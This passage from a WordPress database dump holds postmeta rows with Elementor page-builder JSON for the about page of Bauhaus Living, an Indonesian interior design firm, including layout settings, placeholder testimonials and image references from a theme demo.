"2023/09/john_allan.jpg\";s:8:\"filesize\";i:50781;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"john_allan-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15494;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3631,4840,'_wp_page_template','elementor_header_footer'),(3632,4840,'_elementor_edit_mode','builder'),(3633,4840,'_elementor_template_type','wp-page'),(3634,4840,'_elementor_version','3.8.1'),(3635,4840,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"REDESIGN LIFE\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.<\\/p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.<\\/p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about BauHaus\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3636,4840,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3637,4840,'_elementor_pro_version','3.8.1'),(3638,4841,'_wp_page_template','elementor_header_footer'),(3639,4841,'_elementor_edit_mode','builder'),(3640,4841,'_elementor_template_type','wp-page'),(3641,4841,'_elementor_version','3.8.1'),(3642,4841,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top 